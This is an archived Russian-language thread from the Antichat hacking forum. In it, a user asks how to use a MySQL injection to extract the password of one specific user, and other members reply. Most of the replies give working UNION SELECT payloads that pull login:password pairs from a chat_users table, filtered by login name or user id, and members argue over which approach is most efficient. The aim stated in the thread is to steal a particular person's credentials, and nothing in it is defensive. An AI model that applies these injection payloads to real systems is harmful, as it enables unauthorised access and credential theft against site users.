Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
SQL-inj,поиск по логину... |
28.10.2007, 22:38
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955
Репутация:
-5
|
|
SQL-inj,поиск по логину...
Есть MySQL-inj , в базе дофигища юзеров а мне нужен пасс конкретно одного (не админа), как можно составить запрос чтоб выдало пасс конкретного юзера?...допустим
Код:
http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+from+chat_users/*
Выдаст нейм:пасс, а как сделать чтоб конкретного юзера?
p.s. limit не предлагать))(Выдает только по одному) |
|
|
28.10.2007, 23:04
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
пользуйся limit+0,1 и т.д.)))) а вообще найди айди тваоего юзера и вокруге перебирай циферки
|
|
|
|
28.10.2007, 23:07
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
мне нужен пасс конкретно одного
(Выдает только по одному)
Ты определись.  Узнай порядковый номер пользователя в базе и составь запрос....
Ну или:
...from+chat_users+where+login=char(ися пользователя в char`е)/*
|
|
|
|
29.10.2007, 00:31
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
попробуй так так
Код:
-1+union+select+concat(password),0,0,0+from+chat_users+where+login='name'/*
где name имя нужно юзера |
|
|
|
29.10.2007, 01:53
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
судя по твоему форуму/доске у тя участвует ид пользователя
ну вот найди линк на его репутацию и используй запрос
http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+f rom+chat_users+where+id=[value]/*
где вместо [value] вставь значение ид |
|
|
|
29.10.2007, 17:40
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от Sn@k3
пользуйся limit+0,1 и т.д.)))) а вообще найди айди тваоего юзера и вокруге перебирай циферки
Угу невероятно дельный совет, зачем что то говорить и советовать если сам это не знаешь?
Перебирать лимитом крайне не рационально:
1) Если запись пользователя тысячная или даже сотая, то это займет очень много времени
2) Даже если знать id пользователя (кстати далеко не обязательно что такой параметр есть именно в таблице с пользователями) то далеко не обязательно что id пользователя совпадет с номером записи
Здесь надо было делать:
Сообщение от delay(0)
Ты определись. Узнай порядковый номер пользователя в базе и составь запрос....
Ну или:
...from+chat_users+where+login=char(ися пользователя в char`е)/* Вообще так и только так, а не искать порядковые номера и т.д. - все должно быть сделано максимально рационально.
p.s Qwertison - юзай пожалуйста поиск ты почти каждый день создаёшь темы, а нужную инфу легко найти в статьях, да и тему "Ваши вопросы по уязвимостям." никто не отменял, здавай такие вопросы в ней.
Последний раз редактировалось Grey; 29.10.2007 в 17:46..
|
|
|
|
30.10.2007, 00:16
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Для кого создана - http://forum.antichat.ru/thread46016.html - эта тема?
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
